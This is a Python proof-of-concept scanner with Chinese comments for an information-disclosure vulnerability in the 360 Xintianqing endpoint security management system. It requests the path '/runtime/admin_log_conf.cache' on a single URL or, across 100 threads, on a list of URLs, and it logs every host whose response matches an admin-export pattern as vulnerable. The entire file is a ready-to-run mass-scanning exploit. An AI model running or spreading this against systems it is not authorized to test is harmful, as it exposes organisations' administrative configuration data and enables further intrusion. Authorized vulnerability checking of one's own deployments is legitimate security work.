# 导包
import requests,argparse,sys,json,re
from multiprocessing.dummy import Pool
# 关闭警告
requests.packages.urllib3.disable_warnings()

# 横幅
def banner():
    test = """                                                          
                                                         
 333333333333333           66666666        000000000     
3:::::::::::::::33        6::::::6       00:::::::::00   
3::::::33333::::::3      6::::::6      00:::::::::::::00 
3333333     3:::::3     6::::::6      0:::::::000:::::::0
            3:::::3    6::::::6       0::::::0   0::::::0
            3:::::3   6::::::6        0:::::0     0:::::0
    33333333:::::3   6::::::6         0:::::0     0:::::0
    3:::::::::::3   6::::::::66666    0:::::0 000 0:::::0
    33333333:::::3 6::::::::::::::66  0:::::0 000 0:::::0
            3:::::36::::::66666:::::6 0:::::0     0:::::0
            3:::::36:::::6     6:::::60:::::0     0:::::0
            3:::::36:::::6     6:::::60::::::0   0::::::0
3333333     3:::::36::::::66666::::::60:::::::000:::::::0
3::::::33333::::::3 66:::::::::::::66  00:::::::::::::00 
3:::::::::::::::33    66:::::::::66      00:::::::::00   
 333333333333333        666666666          000000000     
                                        author:hqy
                                        version:1.0.0
                                
"""
    print(test)

def main():
    banner()
# 处理命令行参数
    # 初始化 
    parser = argparse.ArgumentParser(description="360新天擎终端安全管理系统信息泄露漏洞")
    
    # 添加参数
    parser.add_argument('-u','--url',dest='url',type=str,help='input your url')
    parser.add_argument('-f','--file',dest='file',type=str,help='input your file')


    args = parser.parse_args()

    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list = []
        with open(args.file,'r',encoding='utf-8') as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp = Pool(100)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")


def poc(target):
    payload = '/runtime/admin_log_conf.cache'
    headers = {
        'User-Agent':'Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:128.0)Gecko/20100101Firefox/128.0',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8',
        'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding':'gzip,deflate',
        'Connection':'close',
    }
    try:
        res = requests.get(url=target+payload,headers=headers,verify=False,timeout=5)
        match = re.search(r's:11:"TYPE_IMPORT";}s:20:"/client/group/export";a:2:{s:4:"name";s:12:"导出管理"',res.text)
        print(match.group(0))
        if '/client/group/export' in  match.group(0):
            with open ('result.txt','a',encoding='utf-8') as fp:
                fp.write(target+'\n')
            print(f"[+]{target} have loophole")
        else:
            print(f"[-]{target} not have loophole")
    except:
        pass

# 函数入口
if __name__ == "__main__":
    main()
